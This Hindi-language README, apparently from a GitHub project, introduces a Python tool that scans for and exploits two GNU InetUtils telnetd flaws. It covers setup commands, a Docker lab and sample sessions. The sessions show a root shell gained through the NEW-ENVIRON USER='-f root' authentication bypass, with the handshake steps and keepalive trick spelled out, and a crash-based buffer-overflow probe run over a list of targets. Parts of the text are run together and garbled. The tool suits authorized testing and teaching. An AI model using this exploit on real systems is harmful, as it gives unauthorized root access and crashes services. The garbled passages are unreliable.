
स्कैनर/एक्सप्लॉइटर CVE-2026-24061 और CVE-2026-32746
GNU InetUtils telnetd में दो गंभीर कमजोरियों का पता लगाने और (जहाँ लागू हो) शोषण करने के लिए एक Python-आधारित सुरक्षा मूल्यांकन उपकरण:
USER पर्यावरण चर इंजेक्शन के माध्यम से प्रमाणीकरण बाईपास (CVSS 9.8)यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
जिन सिस्टमों का आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, उनके विरुद्ध अनधिकृत उपयोग अवैध है। लेखक इस उपकरण के दुरुपयोग या इससे होने वाली क्षति के लिए कोई जिम्मेदारी नहीं लेते हैं। अपने स्वयं के जोखिम पर उपयोग करें।

TELNET_SCAN_VERBOSE=1 सेट करेंgit clone https://github.com/ekomsSavior/telnet_scan.git
cd telnet_scan
chmod +x telnet_scanner.py
python3 telnet_scanner.py
वास्तविक सिस्टमों को जोखिम में डाले बिना ज्ञात कमजोर लक्ष्य के विरुद्ध शोषण का परीक्षण करें:
cd lab
docker compose up -d
cd ..
python3 telnet_scanner.py
# Target: 127.0.0.1, Port: 2323
लैब एक पृथक कंटेनर में एक कमजोर GNU InetUtils 2.5 telnetd चलाता है, जो केवल localhost से बंधा होता है। कोई नेटवर्क एक्सपोज़र नहीं।
टेलनेट हैंडशेक डीबग करें और वायर पर वास्तव में क्या हो रहा है, इसे देखें:
TELNET_SCAN_VERBOSE=1 python3 telnet_scanner.py
वर्बोज़ आउटपुट दिखाता है:

1 चुनें192.168.1.100 या example.com)23 है यदि खाली छोड़ा जाए)1 – दोनों कमजोरियाँ2 – केवल CVE-2026-24061 (प्रमाणीकरण बाईपास)3 – केवल CVE-2026-32746 (बफर ओवरफ्लो)targets.txt:
192.168.1.100
192.168.1.101
10.0.0.50
example.com
# यह एक टिप्पणी पंक्ति है - अनदेखा किया गया
2 चुनें23 है)यदि CVE-2026-24061 सफल होता है:
id, whoami, ls)Ctrl+C दबाएँकोई अलग टर्मिनल या अतिरिक्त चरणों की आवश्यकता नहीं है।
वास्तविक GNU InetUtils telnetd के साथ संगतता सुनिश्चित करने के लिए शोषण एक सटीक 6-चरणीय टेलनेट हैंडशेक का अनुसरण करता है:
DO विकल्पों के लिए 15 सेकंड तकTTYPE, TSPEED, XDISPLOC, NEW_ENVIRON स्वीकार करेंNEW_ENVIRON उप-वार्ता के माध्यम से USER="-f root" सेट करेंSGA, ECHO, LINEMODE, NAWS के लिए DO/WILL का उत्तर दें# , root@, या $ प्रॉम्प्ट देखेंएक कीपलाइव थ्रेड पेलोड प्रोसेस होने से पहले telnetd के ttloop() को EOF का पता लगाने और exit(1) कॉल करने से रोकने के लिए हर 2 सेकंड में IAC NOP भेजता है।
कमजोर telnetd /usr/bin/login को -f root पास करता है, प्रमाणीकरण को बायपास करता है और तत्काल रूट शेल एक्सेस प्रदान करता है।
LINEMODE विकल्प (RFC 1184) पर बातचीत करता है=== Telnet Vulnerability Scanner ===
1. एकल लक्ष्य स्कैन करें
2. फ़ाइल से लक्ष्य स्कैन करें (प्रति पंक्ति एक IP/होस्टनाम)
3. बाहर निकलें
विकल्प चुनें: 1
पोर्ट (डिफ़ॉल्ट 23):
कौन से परीक्षण चलाने हैं?
1. दोनों
2. केवल CVE-2026-24061 (auth bypass - यदि कमजोर है तो शेल देगा)
3. केवल CVE-2026-32746 (बफर ओवरफ्लो का पता लगाना)
विकल्प [1-3]: 1
लक्ष्य (IP या डोमेन): 192.168.1.100
[*] 192.168.1.100 हल किया गया -> 192.168.1.100
[*] 192.168.1.100:23 स्कैन किया जा रहा है...
[*] जाँच की जा रही है कि क्या सेवा पहुँच योग्य है...
[+] सेवा पहुँच योग्य
[*] CVE-2026-24061 (प्रमाणीकरण बाईपास) का परीक्षण किया जा रहा है...
[!] CVE-2026-24061: कमजोर – शेल प्राप्त हुआ!
============================================================
[+] रूट शेल प्राप्त हुआ! अब आप एक इंटरैक्टिव रूट शेल में हैं।
[+] यहाँ सीधे कमांड टाइप करें। शेल से बाहर निकलने के लिए Ctrl+C दबाएँ।
============================================================
id
uid=0(root) gid=0(root) groups=0(root)
[चरण 1/6] सर्वर वार्ता की प्रतीक्षा कर रहा है (15 सेकंड तक लग सकते हैं)...
[चरण 1/6] 48 बाइट्स प्राप्त हुए: fffb18fffb20fffb23fffb27...
डिकोड किया गया: IAC DO TERMINAL-TYPE
डिकोड किया गया: IAC DO TERMINAL-SPEED
डिकोड किया गया: IAC DO X-DISPLAY-LOCATION
डिकोड किया गया: IAC DO NEW-ENVIRON
[चरण 2/6] सभी DO विकल्पों के लिए WILL का उत्तर दिया जा रहा है
[चरण 3/6] SB SEND उप-वार्ता अनुरोधों की प्रतीक्षा कर रहा है...
[चरण 4/6] उप-वार्ता प्रतिक्रियाएँ भेजी जा रही हैं...
NEW-ENVIRON IS VAR USER VALUE "-f root" *** शोषण ***
[चरण 5/6] शेष विकल्प वार्ताओं को संभाला जा रहा है...
[चरण 5/6] प्राप्त पाठ: 'root@vuln-lab:~# '
[परिणाम] सफलता: USER="-f root" इंजेक्शन के माध्यम से पासवर्ड रहित रूट लॉगिन
=== Telnet Vulnerability Scanner ===
1. एकल लक्ष्य स्कैन करें
2. फ़ाइल से लक्ष्य स्कैन करें (प्रति पंक्ति एक IP/होस्टनाम)
3. बाहर निकलें
विकल्प चुनें: 2
पोर्ट (डिफ़ॉल्ट 23):
लक्ष्यों वाली फ़ाइल का नाम दर्ज करें (प्रति पंक्ति एक): targets.txt
कौन से परीक्षण चलाने हैं?
1. दोनों
2. केवल CVE-2026-24061 (auth bypass - यदि कमजोर है तो शेल देगा)
3. केवल CVE-2026-32746 (बफर ओवरफ्लो का पता लगाना)
विकल्प [1-3]: 1
[*] targets.txt से 3 लक्ष्य लोड किए गए
==================================================
[1/3] 192.168.1.100:23 स्कैन किया जा रहा है
==================================================
[*] 192.168.1.100 हल किया गया -> 192.168.1.100
[+] सेवा पहुँच योग्य
[*] CVE-2026-24061 का परीक्षण किया जा रहा है...
[!] CVE-2026-24061: कमजोर – शेल प्राप्त हुआ!
[?] शेल प्राप्त हुआ! अब बातचीत करें? (y/N): n
[*] CVE-2026-32746 का परीक्षण किया जा रहा है...
[+] सर्वर क्रैश नहीं हुआ; संभवतः कमजोर नहीं
==================================================
[2/3] 192.168.1.101:23 स्कैन किया जा रहा है
==================================================
[-] 192.168.1.101:23 पर सेवा पहुँच योग्य नहीं
==================================================
[3/3] example.com:23 स्कैन किया जा रहा है
==================================================
[*] example.com हल किया गया -> 93.184.216.34
[+] सेवा पहुँच योग्य
[*] CVE-2026-24061 का परीक्षण किया जा रहा है...
[+] कोई प्रतिक्रिया प्राप्त नहीं हुई; अभी भी कमजोर हो सकता है
[*] CVE-2026-32746 का परीक्षण किया जा रहा है...
[!] CVE-2026-32746: कमजोर (सर्वर क्रैश हो गया)
============================================================
स्कैन सारांश
============================================================
192.168.1.100: CVE-2026-24061 के लिए कमजोर
192.168.1.101: सेवा अप्राप्य
example.com: CVE-2026-32746 के लिए कमजोर
============================================================
यदि आप कमजोर सिस्टम पाते हैं, तो ये सुधार लागू करें:
-f से शुरू होने वाले NEW_ENVIRON USER मानों वाले कनेक्शनों के लिएशामिल lab/ निर्देशिका एक सुरक्षित, पुनरुत्पादनीय परीक्षण वातावरण प्रदान करती है:
cd lab
docker compose up -d
# telnetd प्रारंभ होने के लिए ~10 सेकंड प्रतीक्षा करें
python3 ../telnet_scanner.py
# Target: 127.0.0.1, Port: 2323
लैब सुविधाएँ:
labuser:labpass123) शामिल हैसमाप्त होने पर लैब बंद करें:
cd lab && docker compose down

विशेष धन्यवाद @leetcrypt को – उचित 6-चरणीय हैंडशेक, कीपलाइव थ्रेड, वर्बोज़ मोड और Docker लैब शानदार है!
अस्वीकरण: केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए।